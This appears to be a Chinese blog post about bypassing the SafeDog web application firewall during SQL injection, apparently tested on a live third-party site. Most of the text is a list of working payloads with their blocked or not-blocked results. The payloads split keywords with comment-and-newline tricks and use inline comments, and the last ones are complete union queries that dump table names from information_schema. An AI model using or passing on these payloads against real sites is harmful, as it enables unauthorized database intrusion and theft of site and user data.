文章详情
实战sql注入绕过安全狗
实战安全狗bypass
之前有段时间一直在弄注入绕过,正好一个朋友手上有个安全狗的站
绕过 and 1=1
这种很显然直接被拦截,这里进行fuzz
and 1 like 1 拦截
and /!1=1/ 不拦截
and hex(1) 不拦截
%23%0a 1=1 拦截
绕过order by
发现单个order不拦截 单个by不拦截 只要order by 结合就被拦截
安全狗他拦截哪里我们就绕哪里
order%23%0aby 1 不拦截
order /!by / 1拦截
order --+%0a by 拦截
一般安全狗这种对查询中间添加一些无用数据就不会拦截 order xxx by
order all by 1不拦截 但是这种查询语句就无效的,这里我们就要想办法给他给注释掉
order --+all%0a by 1 不拦截 且语句有效
绕过union select
还是单个union不拦截 单个select不拦截 只要union select 结合就被拦截,还是跟order by绕过一样添加数据绕过安全狗的匹配
union%23%0aselect 被拦截
union--+%0aselect 被拦截
union%23xxx%0aselect 不拦截
union-- xxx%0aselect 不拦截
union--+xxx%0aselect 不拦截
这里还有个绕过方法安全狗不会对/ /里面内容进行校验,可以从这里入手
/&ID=-17 union select 1,2,3,4,5,6,7,8,9,10,11,12,13%23/ 不拦截
这里就是通过一个注释符%23把后面 \/ 形成一个完整的sql语句,也可以通过其他注释符进行注释.
ID=-17 "/" union select 1,2,3,4,5,6,7,8,9,10,11,12,13 "/" 不拦截 ,但是这个前提条件对方不开gpc或者使用addslashes()函数要不然单双引号被转义
绕过系统函数
database() -->database/**/() database() -->database/*!()*/ user() --> user/**/() user() -->user/*!()*/
等等,基本上这个/**/就可以绕过了系统函数
绕过查询数据库表
如果这里我们使用联合查询第二种在里面进行查询的话,就不需要绕过直接构造正常语句就可以进行查询
?/*&ID=-17 union select 1,group_concat(table_name),3,4,5,6,7,8,9,10,11,12,13 from information_schema.tables where table_schema=database()%23*/
如果这里我们不使用上面那种方法,来进行绕过.
这里 使用%23njjknjk%0a来绕过union select , from information_schema.tables,这里面%23这里可以随意添加数据%0a,如果转义了单双号进行hex编码绕过
?ID=-17 union %23njjknjk%0a select 1,group_concat(table_name),3,4,5,6,7,8,9,10,11,12,13 from%23njjknjk%0ainformation_schema.tables%23njjknjk%0awhere%20table_schema=0x73685f6a7a%20--+
上一文章:黑客自学书籍手册,黑客零基础入门书籍推荐,自学黑客技术的书
下一文章:程序员和黑客有什么区别?
相关推荐
- 10-28ctf新手要具备什么知识,ctf比赛需要的技术
- 06-10官方简体中文ACDSee Ultimate 10软件安装激
- 05-02编程入门先学什么?编程需要先学哪些
- 03-06间谍软件如何影响杀毒行业的发展?
- 09-16学渗透需要什么基础,0基础能学渗透吗
- 06-02实用工具箱,你生活的好帮手!
- 05-06开发一个软件多少钱?软件开发成本估算
- 01-17「全网首发」朋友圈发这张图能发财!
- 05-11从程序员的角度看最新人口普查数据
- 05-29找网盘种子资源的网站有哪些?
- 01-15linux有必要学吗?学linux有什么作用,学linu
- 12-13基于随机Cookie的蚁剑动态秘钥编码器
- 05-23电脑的硬件组装有什么?
- 09-09常用的测试报告漏洞和修复建议总结